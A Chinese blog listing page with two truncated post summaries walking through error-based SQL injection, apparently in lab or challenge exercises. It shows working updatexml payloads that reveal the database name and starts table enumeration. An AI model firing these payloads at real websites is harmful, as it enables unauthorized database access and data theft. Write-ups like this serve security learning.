摘要:
1.常规方法测试 2.根据错误信息判断闭合方式为")–+,并且为字符型注入 3.查看当前库 ?id=1") and updatexml(1,concat(0x7e,(database()),0x7e),1)--+ 4.查看库下的所有表88IVGFZVAY ?id=1") and updatexml( 阅读全文
posted @ 2021-09-26 17:23
Nuyoah_QQ
阅读(38)
评论(0)
推荐(0)
摘要:
1.常规方法测试判断注入点 2.爆数据库 ?id=1 and updatexml(1,concat(0x7e,(database()),0x7e),1)--+ 3.查看当前库下的所有表格:ECII73SA8M ?id=1 and updatexml(1,concat(0x7e,(select gro 阅读全文
posted @ 2021-09-26 15:14
Nuyoah_QQ
阅读(31)
评论(0)
推荐(0)

浙公网安备 33010602011771号